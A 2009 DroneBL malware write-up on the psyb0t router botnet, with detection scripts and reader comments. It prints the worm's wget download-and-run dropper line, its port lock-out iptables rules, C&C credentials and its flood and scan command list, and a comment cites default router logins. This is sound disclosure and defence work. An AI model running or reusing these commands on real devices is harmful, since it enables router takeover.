Network Bluepill - stealth router-based botnet has been DDoSing dronebl for the last couple of weeks

Below is a description of a botnet we found in the wild. However,

Update 4 -- Before you read anything else, read this

Am I Vulnerable?

You are only vulnerable if:

  • Your device is a mipsel device (MIPS running in little-endian mode, which is what the worm is compiled for).
  • Your device also has telnet, SSH or web-based interfaces available to the WAN, and
  • Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.

Any device that meets the above criteria is vulnerable, including those built on custom firmware such as OpenWRT and DD-WRT. If the above criteria is not met, then the device is NOT vulnerable.

How can I tell if I have been infected?

Ports 22, 23 and 80 are blocked as part of the infection process (by the iptables rules the dropper adds, NOT by the bot binary itself; running the bot binary on its own will not alter your iptables configuration). Because those rules carry no interface or source restriction, they typically lock out the LAN side as well as the WAN side, so losing telnet/SSH/web access to your own router from inside your network is the symptom to look for. Ports that are blocked only from the WAN side are a sign of correct hardening, not of infection.

If these ports are blocked, you should perform a hard reset on your device, change the administrative passwords, and update to the latest firmware. These steps will remove the rootkit and ensure that your device is not reinfected.

Public Relations and Us

We deal with botnets and abusive hosts, not PR.

We are quite concerned that so few people have contacted us, or anybody else working on this, for further information or to verify that the conclusions written in their articles were correct (there have been a few, but the majority have relied on the 'Slashdot version'). Many articles described this as an "end of the world, all routers are vulnerable" event. This is simply not the case. We would prefer that you contact us if you do not fully understand it.

Commentary found on the Internet about "this rootkit is fake", or "it doesn't run on my ubuntu box", or "UPX doesn't unpack it"

Ok, first off, this binary is for MIPS-based processors, which are not x86 (the kind used in the average PC), so it will not run on your Ubuntu box.

Secondly, this binary IS packed with UPX, but the author has stripped the headers that the stock upx tool needs to decompress it (hence "NotPackedException: not packed by UPX"). A little time with a hex editor to restore those headers will get you the decompressed binary, as will just running it under a mipsel qemu.

Commentary on "why isnt Law Enforcement involved"

Many botnet investigations are handled by the private sector. This is one of those investigations. If a Law Enforcement agency is interested in our work, or the work of anybody else researching this worm, then they should be encouraged to email admins@dronebl.org about it. If we have any useful information they don't already know, we will be more than happy to provide it.

Commentary on "is device X vulnerable?"

Short answer: We don't know. There are so many devices out there that we could not possibly know.

Your best bet would be to take action to upgrade the device firmware and secure any passwords if there is concern that the device may be vulnerable. Such actions will help to avoid exploitation by the worm.

The worm info itself

We have come across a botnet worm spreading around called "psyb0t". It is notable because, to our knowledge, it:

  • is the first botnet worm to target routers and DSL modems
  • contains shellcode for many mipsel devices
  • is not targeting PCs or servers
  • uses multiple strategies for exploitation, including bruteforce username and password combinations
  • harvests usernames and passwords through deep packet inspection
  • can scan for exploitable phpMyAdmin and MySQL servers

Vulnerable devices

  • any Linux mipsel routing device that exposes the router administration interface, sshd or telnetd to the WAN (e.g. in a DMZ) and has weak username/password combinations (including OpenWrt/DD-WRT devices).
  • possibly others

Infection strategy

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once the payload is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.
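As an added example (not code from the DroneBL post or from the worm itself), here is a host-side check that turns the two symptoms above into a test: it parses the text `iptables -S INPUT` prints on the device and flags the three unconditional TCP DROP rules for ports 22, 23 and 80, distinguishing them from the WAN-only DROP rules a hardened router legitimately carries, and it looks for the dropper path `/var/tmp/udhcpc.env` in a process listing. The rule and process listings in the block are constructed samples, and the interface name `eth0.1` for the WAN side is an assumption.

```python
"""Host-side check for the psyb0t lock-out signature (added example).

Parses the text printed by `iptables -S INPUT` (iptables-save syntax) and
a `ps` listing. Infection signature, per the write-up: three INPUT DROP
rules for TCP 22/23/80 with no interface or source restriction, and/or the
dropper /var/tmp/udhcpc.env running. The sample listings are constructed;
the WAN interface name eth0.1 is an assumption.
"""
import shlex

LOCKOUT_PORTS = {"22", "23", "80"}
DROPPER_PATH = "/var/tmp/udhcpc.env"


def parse_rule(line):
    """Turn one `-A CHAIN ...` line into {option: value}; None for other lines."""
    toks = shlex.split(line)
    if len(toks) < 2 or toks[0] != "-A":
        return None
    rule = {"chain": toks[1]}
    i = 2
    while i < len(toks):
        # an option followed by a non-option token takes that token as its value
        if i + 1 < len(toks) and not toks[i + 1].startswith("-"):
            rule[toks[i]] = toks[i + 1]
            i += 2
        else:
            rule[toks[i]] = True  # bare flag
            i += 1
    return rule


def unconditional_drops(iptables_s_output):
    """Return the lock-out ports hit by an INPUT DROP that is not scoped by -i or -s."""
    hit = set()
    for line in iptables_s_output.splitlines():
        r = parse_rule(line)
        if not r or r["chain"] != "INPUT" or r.get("-j") != "DROP":
            continue
        if r.get("-p") != "tcp" or r.get("--dport") not in LOCKOUT_PORTS:
            continue
        if "-i" in r or "-s" in r:
            continue  # scoped rule: WAN-only or source-limited hardening, not the worm
        hit.add(r["--dport"])
    return hit


def dropper_running(ps_output):
    """True if the dropper binary shows up in a process listing."""
    return any(DROPPER_PATH in line for line in ps_output.splitlines())


def is_infected(iptables_s_output, ps_output):
    """All three ports dropped on every interface, or the dropper alive, means infected."""
    return unconditional_drops(iptables_s_output) == LOCKOUT_PORTS or dropper_running(ps_output)


# --- constructed samples -------------------------------------------------
INFECTED_RULES = """\
-P INPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j DROP
"""
HARDENED_RULES = """\
-P INPUT ACCEPT
-A INPUT -i eth0.1 -p tcp -m tcp --dport 22 -j DROP
-A INPUT -i eth0.1 -p tcp -m tcp --dport 23 -j DROP
-A INPUT -i eth0.1 -p tcp -m tcp --dport 80 -j DROP
"""
CLEAN_PS = "  PID USER       COMMAND\n  312 root       /usr/sbin/telnetd\n"
INFECTED_PS = CLEAN_PS + " 1337 root       /var/tmp/udhcpc.env\n"

if __name__ == "__main__":
    for name, rules, ps in (("infected", INFECTED_RULES, INFECTED_PS),
                            ("hardened", HARDENED_RULES, CLEAN_PS)):
        print(name, "-> infected" if is_infected(rules, ps) else "-> clean")
```

Run it on the device (or paste the device's `iptables -S INPUT` and `ps` output into the two constants); a hardened router that only drops these ports on its WAN interface is reported clean, while the worm's interface-less rules trip the check.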

IRC Botnet

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: [NIP]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

strcpy.us.to control domain nameservers: ns1.afraid.org, ns2.afraid.org, ns3.afraid.org, ns4.afraid.org [suspended]
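As an added example (not the post's code), here is how the indicators above translate into a network-side matcher that could be run over captured IRC sessions from the LAN: it takes the destination port and the raw lines a host sent, and reports hits on port 5050, the server password, the bot nick pattern and the #mipsel join. The sessions in the block are constructed, and the nick regex reads the post's `[A-Z/0-9]{9}` as nine uppercase letters or digits (an assumption).

```python
"""Network-side matcher for the psyb0t C&C indicators (added example).

Takes one captured client-to-server IRC session (destination port plus the
raw lines the client sent) and reports which of the post's indicators it
matches: TCP 5050, server password $!0@, nick [NIP]-XXXXXXXXX, and a JOIN to
#mipsel. The nick pattern is read as nine uppercase letters or digits
(assumption: the post writes it as [A-Z/0-9]{9}). Sample sessions are
constructed.
"""
import re

CNC_PORT = 5050
CNC_PASS = "$!0@"
CNC_CHANNEL = "#mipsel"
NICK_RE = re.compile(r"^NICK\s+\[NIP\]-[A-Z0-9]{9}$")


def indicators(dst_port, client_lines):
    """Return the set of indicator names matched by this session."""
    hits = set()
    if dst_port == CNC_PORT:
        hits.add("port")
    for raw in client_lines:
        line = raw.strip()
        parts = line.split()
        if not parts:
            continue
        cmd = parts[0].upper()
        if cmd == "PASS" and len(parts) > 1 and parts[1].lstrip(":") == CNC_PASS:
            hits.add("pass")
        elif cmd == "NICK" and NICK_RE.match(line):
            hits.add("nick")
        elif cmd == "JOIN" and len(parts) > 1 and CNC_CHANNEL in parts[1].split(","):
            hits.add("channel")  # JOIN may list several channels comma-separated
    return hits


def is_psyb0t_session(dst_port, client_lines):
    """Nick or password alone is specific enough; port or channel need a second hit."""
    h = indicators(dst_port, client_lines)
    return bool(h & {"nick", "pass"}) or len(h) >= 2


# --- constructed samples -------------------------------------------------
BOT_SESSION = ["PASS $!0@", "NICK [NIP]-K3Q9ZT7A2", "USER mipsel 0 * :mipsel",
               "JOIN #mipsel %#8b"]
USER_SESSION = ["NICK alice", "USER alice 0 * :alice", "JOIN #linux"]

if __name__ == "__main__":
    print("bot  ", sorted(indicators(5050, BOT_SESSION)), is_psyb0t_session(5050, BOT_SESSION))
    print("user ", sorted(indicators(6667, USER_SESSION)), is_psyb0t_session(6667, USER_SESSION))
```

Port 5050 on its own is deliberately not conclusive (plenty of legitimate traffic uses it), which is why the decision requires either a high-confidence token or two independent hits.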

IRC Commands

.mode <channel> <modes> - sets a mode on a channel
.login <password> - login to the bot
.logout - logout
.exit - causes the botnet to exit and remove itself
.sh <command> - runs <command> on shell
.tlist - lists all threads
.kill - kills a thread
.killall <pattern> - kills threads by glob-match pattern
.silent - makes the bot stop sending to channel
.getip - show bot WAN ip address
.visit <url> - flood URL with GET requests
.scan - scans a random range for vulnerable routers/modems
.rscan <range> - scans a CIDR range for vulnerable routers/modems
.lscan - scans the local subnet for vulnerable routers/modems
.lrscan - scans a range in the local subnet for vulnerable routers/modems
.split <threadid> - splits the workload of a scan thread into two threads
.sql <range> <url> - scans for vulnerable MySQL servers and attempts to make them download and run URL
.pma <range> <url> - scans for vulnerable phpMyAdmin and attempts to make them download and run URL
.sleep <secs> - makes the bot sleep for the given time
.sel - ???
.esel - skip next part if locale is not X
.vsel - skip next part if version is not X
.gsel - ???
.rejoin [delay] - cycle the channel after delay
.upgrade - download new bot from the distribution site
.ver - returns "[PRIVATE] PSYB0T" followed by version
.rs - returns detected rapidshare URLs and logins
.rsgen - generate a bogus rapidshare login page and force user to browse to it
.rsloop <port> - runs a webserver i/o loop on <port> as a thread
.wget <url> - runs wget with the provided url
.r00t - attempts to raise effective UID using vmsplice() exploit (seems pointless)
.sflood <ip> <count> - sends SYN packets to IP
.uflood <ip> <count> - sends UDP packets to IP
.iflood <ip> <count> - sends ICMP pings to IP
.pscan <ip> - portscans IP
.fscan <ip> - tries to bruteforce FTP server at IP

Commentary

As stated above, this is the first known botnet based on exploiting consumer network devices, such as home routers and cable/dsl modems. Many devices appear to be vulnerable. The size of this botnet so far cannot be determined.

The author of this worm has some sophisticated programming knowledge, given the nature of this executable.

Action must be taken immediately to stop this worm before it grows much larger.

We came across this botnet as part of an investigation into the DDoS attacks against DroneBL's infrastructure two weeks ago, and feel that this botnet was the one which flooded DroneBL.

We are looking into finding out more information about this botnet, and its controller. If you have any information, we would like to know.

If you intend to disassemble this botnet, you should note it is UPX-compressed (with the UPX headers stripped, as described above).

I estimate that at the time of writing, there are at least 100,000 hosts infected.

I suspect that the .sql and .pma exploit tools are used for finding more controllers. But I do not have the controller payload.

This technique is one to be extremely concerned about because most end users will not know their network has been hacked, or that their router is exploited. This means that in the future, this could be an attack vector for the theft of personally identifying information. This technique will certainly not be going away.

Update

Some prior research about an earlier version has been found here. This research was done by Terry Baume.

Update 2

This botnet has apparently been shut down:

* Now talking on #mipsel
* Topic for #mipsel is: .silent on .killall .exit ._exit_ .Research is over:
for those interested i reached 80K. That was fun :), time to get back to the real life... (To the DroneBL guys:
I never DDOSed/Phished anybody or peeked on anybody's private data for that matter)
* Topic for #mipsel set by DRS at Sun Mar 22 17:02:15 2009

While this information may or may not be true, we have received HTTP-based floods from IPs participating in this botnet.

We are still interested in this DRS person. If you have any information, please provide it to DroneBL. We will not disclose our sources.

We also hope that the router and modem manufacturers which have been monitoring this incident take note of it and secure their firmware from future attacks.

Update 3 (Disinfection Instructions)

We have been getting asked a lot about disinfection instructions.

To disinfect, simply powercycle your device and take appropriate action to lock it down, including the latest firmware updates, and using a secure password.



nenolod / Mar-22-2009 07:32:31 GMT

Comments for Network Bluepill - stealth router-based botnet has been DDoSing dronebl for the last couple of weeks

These are the 66 (2 hidden) comments for the above post.

CryptWizard said on Mar-22-2009 07:45:19 GMT :

You never know when browsing a forum could somehow lead you to something like this: http://forums.whirlpool.net.au/forum-replies.cfm?t=1164229&p=2

BTW, nenolod, post your 2006 paper on the feasibility of this! =P

William Pitcock said on Mar-22-2009 07:52:00 GMT :

I will need to find it, but will do so as soon as I find it in the mess that is my $HOME. :)

William Pitcock said on Mar-22-2009 10:25:20 GMT :

That paper is here, but it has been updated with some of the information above.

Lemming said on Mar-22-2009 11:25:34 GMT :

UPX-packed? If I try to unpack it:

upx: udhcpc.env: NotPackedException: not packed by UPX

Lemming said on Mar-22-2009 11:44:55 GMT :

Found an older research: http://www.adam.com.au/bogaurd/

phrozen77 said on Mar-22-2009 12:50:38 GMT :

"upx: udhcpc.env: NotPackedException: not packed by UPX"

The UPX header probably has been removed/changed to avoid automated spotting/unpacking of AV scanners.

Also, it is sort of trivial to change the way UPX packs stuff to add even more stealth to it, so your luck with unpacking it may vary - especially in upcoming generations of this.

Paul said on Mar-22-2009 15:31:12 GMT :

So the real question is how can someone know if their router/modem is infected? Is there an easy test that can be performed? What about a way to clean it?

I assume flashing a router will clean it but what about most DSL modems? They tend to be much harder to do and will probably just be replaced by most ISP's.

Lemming said on Mar-22-2009 16:21:56 GMT :

"It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports."

Test these ports if you have them enabled.

William Pitcock said on Mar-22-2009 21:04:11 GMT :

@Lemming: The current version (v18) seems to be packed in a different way. We suspect a modified version of UPX.

pjotr said on Mar-23-2009 18:47:03 GMT :

How can one protect one's router? Do you have any configuration suggestions?

Repton said on Mar-24-2009 00:31:05 GMT :

Don't let your router accept logins (web/ssh/etc.) from anywhere outside your home network.

WildFlame said on Mar-24-2009 00:53:32 GMT :

Easy way to take over control on remote router based on some versions of linux is login using default login/pass via ssh (port 22): login: admin password: admin I have seen lots of routers with unchanged password.

Shadyman said on Mar-24-2009 00:59:00 GMT :

@WildFlame:

Many routers, regardless of their OS, use the default password.

Rumpelstiltskin. said on Mar-24-2009 01:38:09 GMT :

And the moral is: don't use passwords that are in wordlists.

Iceman_B said on Mar-24-2009 01:46:51 GMT :

What about disabling password-based logins (at least remote) and only allowing key-based connections? Shouldn't that help?

Überslack said on Mar-24-2009 02:05:17 GMT :

Are there any methods to detect if your router has been compromised (besides not being able to remotely login)?

William Pitcock said on Mar-24-2009 02:14:23 GMT :

@Überslack: Many routers will be locked out on LAN too with those iptables rules.

At any rate powercycling it will remove this worm.

Bob Bonomo said on Mar-24-2009 02:16:01 GMT :

Guess it was just a matter of time before this happened. Sorta knew it could be done.

public/private keys with your SSHD would sure make it harder if not impossible.

Ard Righ said on Mar-24-2009 02:21:07 GMT :

Note to self: Change user name and password on home router, and brother's home router also.

Iceman_B said on Mar-24-2009 02:48:55 GMT :

AFAIK and FWIW(acronyms ftw!): I don't think you can change the user for shell access in DD-WRT. It's always "root". The login for the WebUI CAN be changed and it would be wise to do so.

dan said on Mar-24-2009 04:13:46 GMT :

Surely it shouldn't be too much effort for manufacturers to ship these things with better passwords than "password". They should add a step to the post production process that assigns a unique password and prints this on the label on the bottom of the unit.

dan said on Mar-24-2009 04:21:30 GMT :

Just noticed the author of this thing is only one letter short of my initials! Grrr

Michael said on Mar-24-2009 06:17:46 GMT :

"is the first botnet worm to target routers and DSL modems"

Which DSL modems? Are SpeedTouch ADSL modems affected by this?

Toni said on Mar-24-2009 07:42:06 GMT :

The latest available in that URL is packed with UPX but as someone above suspected they've removed the headers. I didn't have a MIPS device at hand to work it in runtime so I resorted to manually fixing the headers so that the UPX tool bites:

http://www.teamfurry.com/wordpress/2009/03/23/botnet-running-on-mips-cpu-devices/

the version I downloaded was 2.9L so it has seen steady development in the past few months. Also, the new version connects to other servers and channels but I haven't been able to verify yet whether they are active.

Tamas Feher from Hungary said on Mar-24-2009 09:34:59 GMT :

Sounds like bullshit. If it was actually DDoS-ing DroneBL, why didn't you go straight to the FBI and ICANN and ask to shut down the "dweb.webhop.net" address which spreads the home-router worm? Why is the worm site still alive this very minute?

The Conficker Cabal led by Microsoft has been shutting down and disappropriating literally THOUSANDS of rogue domain names every single day totally reliably, with little effort and without any delay.

You could do that if you wanted to! This shows you have no meat to offer for the law enforcement, it's just a PR bubble!

William Pitcock said on Mar-24-2009 10:00:04 GMT :

@Tamas Feher from Hungary: Your comment indicates your complete obliviousness to law enforcement and their caring about internet activities. Here's a tip: they don't care unless there is some compelling reason for them to do so. Usually this reason has to do with money. If they cared, there would be no reason at all for DroneBL to exist.

William Pitcock said on Mar-24-2009 10:45:39 GMT :

@Tamas Feher from Hungary: Further, the dweb.webhop.net address is still active because there is no point in shutting it down. The botnet itself is still active, and it is a matter of finding the current C&C. By shutting down that URL, we simply lose the ability to find out where the new C&C is.

Chris Snyder said on Mar-24-2009 12:20:04 GMT :

Great work, guys. The Linux router space is such low-hanging fruit for bad guys, I'm surprised they still even bother with all of those virus-addled Windows hosts... except as attack vectors into the local network infrastructure.

Once in the router you are essentially in ultimate stealth mode as far as the vast majority of users are concerned. Who would even think to look there?

Pjotr said on Mar-24-2009 13:34:36 GMT :

I have disabled wireless access to the configuration screen (setup screen) of my router. So the router configuration (setup) is only reachable through a wired connection.

The router runs on the latest firmware from Linksys. Being a Linksys WRT54GL, I can only change the password. Unfortunately it is not possible to change the user name. I have customized the password, which is not from a dictionary.

Is this enough protection?

nbd said on Mar-24-2009 14:14:38 GMT :

OpenWrt blocks any open port from the WAN side by default, so in the default configuration, it's safe. Also: not all devices running OpenWrt are mips

Newsman said on Mar-24-2009 14:18:29 GMT :

To Iceman_B -- yes, you can change the username and password on DD-WRT. I'm not exactly a guru on these things, but I've done about three now and that is one of the things you can change. I just wish I could put the firmware on my wired-only router.

Crichton said on Mar-24-2009 15:05:19 GMT :

Actually, you CAN change the Username on a Netgear router. To do so, do the following:

After you have changed your password to something complex, and made a note of this password someplace safe, then select Backup Settings from the routers web-interface menu, and save this .cfg to your PC. Now edit that .cfg file - which is nothing more than a text file and change the string for "Username=admin" to something a bit more diverse. Save the file, and "restore" the settings to the router from the web-interface.

Adding entropy to prevent Wicked-People router-attacks? Done.

Crichton said on Mar-24-2009 15:12:34 GMT :

Actually, we are quite lucky...

This issue has been around for a while, and those in the Cognoscenti have been moaning about it for years.

This w0rm could have been so much worse.

C.

Vitality said on Mar-24-2009 15:33:37 GMT :

Well, it is not the fault of the end-user. It is the fault of the vendor and firmware developers. As a Linux/Unix specialist, I can confirm: any open ssh, ftp, telnet and perhaps www is huge fruit for bad guys, especially when the password is not strong...

Do not open ports for remote shell and in any case use strong passwords and you will be well :)

Eric the Red said on Mar-24-2009 19:21:57 GMT :

"We are quite concerned that nobody has contacted us, or anybody else working on this for further information or to verify if their conclusions written in their articles were correct."

Funny guys, know all about routers and still appear to be completely oblivious to the internet.

I've worked with computers for a bit but "mipsel" as in "Your device is a mipsel device" meant nothing to me at first, although I guessed that MIPS was involved somehow.

Good article.

Also, I would find vendors who make telnet, SSH or web-based interfaces available to the WAN by default culpable too. I've seen a few.

Red_Wolf_2 said on Mar-24-2009 22:48:43 GMT :

Fascinating breakdown on what this nasty little worm does (yes, im the one who started the whirlpool thread about bulletin boards).

This sure does feel like a sign of what's to come, especially if whoever coded it did it as a PoC for others with nastier intentions... In any case, now the idea is out there and well publicised I am sure those with "commercial interests" will start working on their own versions, or a script kiddie could just change the irc server the bot heads to...

Did anyone figure out why some infected hosts were doing a ps -aux when they thought they had connected to a new host?

MIke S said on Mar-25-2009 07:17:20 GMT :

I'm always surprised to find out how many people I talk with who leave their router login unchanged from the default. Aughh!

simbr said on Mar-25-2009 08:42:40 GMT :

@Crichton You can also change the Netgear username (at least on the model I'm familiar with) using this CLI command:

nvram set http_username=newusername

(possibly followed by nvram commit)

Phil said on Mar-25-2009 12:30:13 GMT :

Ports 22, 23 and 80 are blocked as part of the infection process

For the hard-of-thinking like me you might like to edit that to be more explicit about "ports blocked from LAN = symptom of infection" but "ports blocked from WAN = safe from infection".

We came across this botnet as part of an investigation into the DDoS attacks against DroneBL's infrastructure

You might like to be more explicit about exactly how you found it. Some people will be sceptical because the bot was so conveniently shut down just as you announced it, making the story harder to verify. I feel it would add credibility to expand on some of the details.

William Pitcock said on Mar-25-2009 12:52:44 GMT :

@Phil: We received a tip about the botnet's existence and compared known IPs participating in this botnet with those we had found in our logs. I would figure the statement I made earlier makes that clear.

Draft_ said on Mar-25-2009 16:17:26 GMT :

I think maybe it's a good idea to list here all known mipsel devices?

Narles said on Mar-25-2009 16:41:22 GMT :

So far I haven't found a list of mfr names and model numbers! How can I tell if my Netgear wpn824 is affected?

AlexandreG said on Mar-25-2009 17:00:07 GMT :

Well... If I understand this correctly, in order to be infected, the router needs to be manageable from the WAN side.

I saw somewhere that linksys routers could be infected... It may be true! But in order to be infected (again if I am right...) you need to enable remote management. And I never saw a linksys home router with remote management enabled by default.

Same for all other brands I tried...

And even If you enable remote management, you need to have a weak password to be infected.

I never had a home router that had remote management turned on by default...

So, for wired router like the linksys or dlink ones, even if you haven't changed the password, you can't be infected because the remote administration is disabled.

Dan said on Mar-25-2009 17:54:23 GMT :

the problem is that many home and business users depend on ISP-provided routers that they have no control over other than a user-level password and access.

This large number of vulnerabilities is simply left up to the ISP to clear/reset/fortify, when they get the time to do it...

@Narles: Don't try to tell. Your best bet is to simply follow nenolod's instructions and reset your router. That will knock it out if you are, and again follow his instructions and SECURE your router by changing the password and as AlexandreG mentions, by turning OFF remote administration.

mike b said on Mar-25-2009 18:47:33 GMT :

" How can I tell if I have been infected? Ports 22, 23 and 80 are blocked as part "

Would this imply that an infected router cannot be logged into by its owner anymore? Does the botnet change the password?

mikec said on Mar-25-2009 19:30:54 GMT :

So what would be a good metric in general, for determining whether a device were attackable? I.e. if one wanted to make a tool that could say "your device is vulnerable" by running a quickie test on it...

Maybe there's not a way to do this without being malicious one's self... buzzkill...

William Pitcock said on Mar-25-2009 21:37:31 GMT :

@AlexandreG: Nobody said this didn't mostly target idiots. However, there are quite a few routers out there which have remote administration on by default. I have been informed that the routers that Charter provides all behave in this way.

@mike b: No, it does not change the device password.

@mikec: The metric I posted in the are you vulnerable? part.

Draft_ said on Mar-25-2009 22:27:54 GMT :

Fundamental thing is to find out hardware running in little endian mode.

Let's start the listing

WRT54GL - mips cpu little endian (mipsel)

AlexandreG said on Mar-26-2009 02:57:07 GMT :

@ William Pitcock: Wow... I really don't understand why they would turn on remote administration... No "normal" users are going to use it...

I use remote administration on some devices, but those are INSIDE a LAN... I would never make the admin available on the internet...

AlexandreG said on Mar-26-2009 03:00:26 GMT :

@Draft_ : No... this is not very important since the WRT54GL doesn't have remote administration turned on by default... But it is a wireless router so there are other security issues... but anyway... In this case, by default, there are no risks...

Little endian or not, it is only a matter of time before the same kind of worm is compiled for other devices.

Christopher said on Mar-26-2009 03:01:48 GMT :

Guys, I made a spanish translation of most of this article on my blog. I know there might be many people feeling more comfortable reading spanish than english.

Anyone interested visit www.j0hnd0e.com.ar

To the authors: I sent an email. Excellent work this one of yours! :)

linux bridge said on Mar-26-2009 05:14:00 GMT :

another way to secure your modem/router is to run it in bridge mode. then you only need to worry about the security of the pc behind the bridge.

Daniel said on Mar-26-2009 10:28:42 GMT :

Thanks for the information about changing the username on a Netgear router. My router is a DG834G.

What restrictions are there on the length of a username? 31 characters? 63 Characters? Other?

Draft_ said on Mar-26-2009 16:47:24 GMT :

AlexandreG,

Did you read the beginning of the post?

"As such, 90% of the routers and modems participating in this botnet are participating due to user-error"

It is not relevant if remote administration is turned off by default - stupid users switch it ON.

LE is also important, since right NOW the only bot version out there is the LE bot. Some day there might also be a BigEndian one, but until we see it, it's not wise to consider this a risk, since there are only a few MIPS processors capable of switching endianness on the fly. For a worm the most important thing is to find a suitable environment to survive. Actually I don't know of any Linux-running BE SOHO routers.

hhhobbit said on Mar-26-2009 19:49:15 GMT :

I don't see much value in changing the login name but if it makes you feel good go ahead. If it doesn't work all you have to do is recycle the puppy and you are back to the defaults. I also don't like a preset login password that is different from unit to unit. What if you lose the box / sheet with the password on it or get the unit from somebody else without that information? The only way that will work is if you burn it onto the box itself along with the serial number (and be prepared for returns if there are foul-ups). Otherwise, once you have lost that password you have effectively disabled the unit so it can never be used again.

Instead, what router manufacturers should do is send their boxes out with config possible only on the WIRED LAN side as the default! Wired WAN and wireless LAN configuration should be off by default. I even take a dim view of them providing wired WAN config at all except for you tinker-toy people to have something to play with. There are some legitimate uses for it but it shouldn't be allowed without restricting which IPs can come at you on the wired WAN side being a mandatory config setting when you turn it on. But just shifting to only wired LAN config alone would have prevented this POC! I don't know how you can get the users to tighten things down. Most of them view these routers as being like a lamp that you just plug in and use. The manufacturer should take steps to tighten anything down so that instead of the user doing the security enhancing they would be doing the opening of security holes. At least then they would be semi-consciously aware of what they are doing. Okay, SOME of them would be aware.

I can't speak for the DNS servers in Hungary, but all of the hosts I saw in the article by Terry Baume have been shut down for French, UK, and US DNS servers. IOW, if the newer hosts being used are similarly nobbled the experimental bot is contained except for all of those packets pelting us.

Is it really a rootkit? If so, why didn't it conceal the pnscans that were running? Further, why close down ports 22, 23, and 80? It can't be just to mark the unit as infected. My bet is that it is done to prevent somebody else from capturing my bot (future use). A good rootkit would make it look like nothing has happened, conceal its presence and go about its business. At the least it should not block ports 22, 23, and 80 access on the wired LAN side and perhaps wireless LAN side if that was prevalent. IOW, I don't classify this as a rootkit (despite that "r00t" string). I do classify it as a worm infection that what I provide has no effect on preventing at all (except for this advice). So have everybody hard reset their modems / routers, upgrade the firmware, change their passwords and enhance any other security settings they have and relax. The passwords can even be dictionary based as long as they are all different in blocking a dumb worm. What kills you is the WAN access and the same default password.

I also fail to see how PII (Personally Identifiable Information) is going out the door on this thing. How is that happening? The last time I checked I don't store PII on my router. IOW, other than understanding all of those 22 and 23 probes on my WAN port I am good to go. You still haven't explained those 21s and others I am getting on my WAN port. So the excitement is all over. Oh yes, I do not have a mipsel but I can guarantee what I have is cinched down as tight as I can get it and that includes a non-default LAN IP subnet. I even totally block port 25 all ways now after that spammer that I basically shut down complained to my ISP that I was the one doing the spamming and the ISP stupidly believed them and shut down my port 25. They opened the 25 port back up but I am blocking it in all directions now and monitoring for ANYBODY that is attempting to use my 25 SMTP port. That is a warning because I report them to my ISP.

So now I am back to work removing the parked and dead proxies from my lists ... the fun is over. PS I am a humanbot - half human, half machine (and have the hardware to prove it in my body). So how do I answer your question?

Ian Walker said on Mar-26-2009 21:52:21 GMT :

I have had problems with these hackers for years. They did this first to an NB9W netcomm router. I tried to get netcomm interested, including getting the government ombudsman involved, but it all went quiet. I then obtained an NB5, and yes I did lock it down, and yes it only took a short amount of time to compromise it. The hackers are either Chinese/Taiwanese/Korean or are others pretending to be. I suspect DSD. Before the psyb0t storm broke I noticed rogue ports opened to sites in Scottsdale in the US, hosted on secureserver sites. The first site was telling as it used psy...phr... as its name (some parts omitted). The person had clickjacked a sign up session I had with a mobile phone used as an AP... I suggest my routers have been used as a prototype of the psyb0t hack (and others), and that someone out there has a rather vicious vendetta against me. I offer a $10000 reward for the arrest and successful prosecution of this person/s

Daniel said on Mar-27-2009 11:08:20 GMT :

hhhobbit said "What if you lose the box / sheet with the password on it or get the unit from somebody else without that information? The only way that will work is if you burn it onto the box itself along with the serial number (and be prepared for returns if there are foul-ups). Otherwise, once you have lost that password you have effectively disabled the unit so it can never be used again.".

Every router I have seen can be returned to factory defaults, so the unit is never completely disabled.

Sec EX said on Mar-28-2009 10:12:17 GMT :

This site seems to be trying to hype "nothing" for attention. Besides, IF it's true then it is no more dangerous than not setting a good password; and anyway, most routers DO NOT allow remote administration by default.

David Leppik said on Mar-28-2009 17:40:41 GMT :

I suspect I was infected today. I don't have publicly accessible administrative access, so at first I thought I was safe. But my wireless network isn't secured, and occasionally neighbors use my network.

Factory-default settings are NOT safe-- LAN-only administration only restricts the attack vector, it doesn't eliminate it.

phil said on Mar-29-2009 04:49:41 GMT :

Don't use a dictionary word as your password and you are 100% safe, imo. If you haven't been using a strong password, flash your router, and start using one. Problem solved.

The lesson to be learned here is that end users need to be better informed about basic security AND vendors need to ensure that this happens.

fghf said on Mar-31-2009 18:49:30 GMT :

This doesn't seem to be effective anymore; Just a proof of concept.

Tom Dark said on Apr-09-2009 20:52:34 GMT :

Where can I get free router security?

zheko said on Apr-13-2009 15:03:34 GMT :

To Tom Dark: I can tune it for you

joan said on May-14-2009 10:26:30 GMT :

Type of bugs that can damage and ruin my computer. If you are like me and tried many different scans in the past looking for something that will protect and clean your computer, give Search-and-destroy Antispyware a try. I found that the antispyware solution from Search-and-destroy (http://www.Search-and-destroy.com) is an excellent choice. It's less expensive than many of the other scans I've tried but it finds the same type of bugs that can damage and ruin my computer. I am so happy with this scanner that I want to tell everyone about it so you can give it a try too. I'm sure you will love it.

